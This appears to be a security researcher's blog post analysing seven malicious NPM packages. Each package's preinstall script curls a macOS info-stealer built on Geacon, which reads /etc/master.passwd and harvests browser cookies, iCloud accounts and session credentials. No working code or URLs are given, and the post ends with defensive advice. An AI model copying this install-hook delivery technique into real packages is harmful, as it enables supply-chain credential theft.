How is the malware delivered?

The delivery mechanism is pretty simple.  The NPM package has only one file: package.json.  In that package file the preinstall script runs a curl command that pulls a file from an Aliyun URL.

What does the malware do?

The malware file is written in Go and compiled as a Mach-O 64bit MacOS executable file.  To my untrained eye, it appears to be a MacOS-specific info-stealer.  It feels similar to last year’s “Macstealer” malware, but under the covers, it’s based on the Geacon project.  Geacon is a rewrite of the Cobalt Strike Beacon in Golang.

Initially, the executable does system discovery, trying to identify what operating system and hardware it’s running on.  The malware lists what executables are on the system.  It opens and reads the /etc/master.passwd file and then it runs the eficheck application to identify what firmware is being run.

The malware then looks for browser cache, cookies, and local storage.  It searches for iCloud accounts, browser plugins, and other places that store credentials.

The malware also tries to steal session credentials from hundreds of websites.

What can you do?

Unfortunately, these packages haven’t been marked as malicious yet, so no security tool could help in this case. Even worse, VirusTotal doesn’t think that the package is malicious.  AND when I analyzed the malware file with Joe’s Sandbox it didn’t think the file was malicious either.  You can check out the public analysis here.

But in general, it’s a good idea not to install NPM packages blindly.  If you know what to look for, there are definite signals that these packages are dodgy.  All 7 of these packages have just one file:  package.json.  This is one of several flags that you can use to determine if a package is legit or not.  In this case, the packages only do one thing:  deliver the malware payload via a curl.  Pretty easy to see if you look, but you have to be looking.  🙂

Paul McCarty

SourceCodeRed.com Security Research & Trainer

https://www.linkedin.com/in/mccartypaul/